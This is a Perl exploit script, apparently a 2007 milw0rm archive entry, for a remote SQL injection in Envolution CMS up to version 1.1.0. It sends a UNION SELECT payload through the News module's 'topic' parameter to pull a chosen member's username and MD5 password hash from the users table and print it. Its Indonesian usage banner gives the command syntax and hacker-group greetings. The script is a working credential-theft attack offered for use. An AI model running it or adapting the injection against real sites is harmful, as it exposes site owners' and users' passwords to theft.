1 #!/usr/bin/perl
2 use LWP::UserAgent;
3 use HTTP::Cookies;
4
5 if(@ARGV < 3)
6 {
7 usage();
8
9 exit();
10 }
11
12 $site = $ARGV[0]; # Site Target
13 $path = $ARGV[1]; # Path direktori envolution_1−0−1
14 $usid = $ARGV[2]; # member id
15
16 $www = new LWP::UserAgent;
17 $sql = "$site/$path/modules.php?op=modload&name=News&file=index&catid=&topic=2%20and%201=2%20union%20all%20select%201,2,3,concat(pn_uname,0x3a,p
n_pass)%20from%20envo_users%20where%20pn_uid=$usid/*";
18 print "\n\n [~] Mencari Username:Password(md5) member id = $usid \n";
19 $res = $www −> get($sql) or err();
20 $res −> content() =~ /<b>(.*)<\/b>/ or err();
21 print "\n [+] Username:Password(md5) member id = $usid \n";
22 print "\n [>] $1 \n\n";
23
24 sub usage()
25 {
26 print "#############################################################\n";
27 print "# newhack[dot]org #\n";
28 print "#############################################################\n";
29 print "# Envolution <= v1.1.0 Remote SQL Injection #\n";
30 print "# http://sourceforge.net/projects/envolution #\n";
31 print "# k1tk4t − newhack[dot]org − Indonesia #\n";
32 print "# cara penggunaan: enov.pl [site] [path] [member id] #\n";
33 print "# contoh: enov.pl http://localhost /html 2 #\n";
34 print "#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#\n";
35 print "# Thanks to; str0ke, xoron, y3dips, #\n";
36 print "# newhack[dot]org staff dan member #\n";
37 print "# mR.opt1lc,fusion,PusHm0v,Ghoz,fl3xu5,bius,iind_id,slackX #\n";
38 print "# Semua Komunitas Hacker dan Sekuriti Indonesia; #\n";
39 print "#############################################################\n";
40 }
41
42 sub err()
43 {
44 print "\n [−] Exploit gagal :( − cari yang lain!";
45 exit();
46 }
47
48 # milw0rm.com [2007−08−05]
Page 1/1
Envolution 1.1.0 topic Remote SQL Injection Exploit
k1tk4t
08/05/2007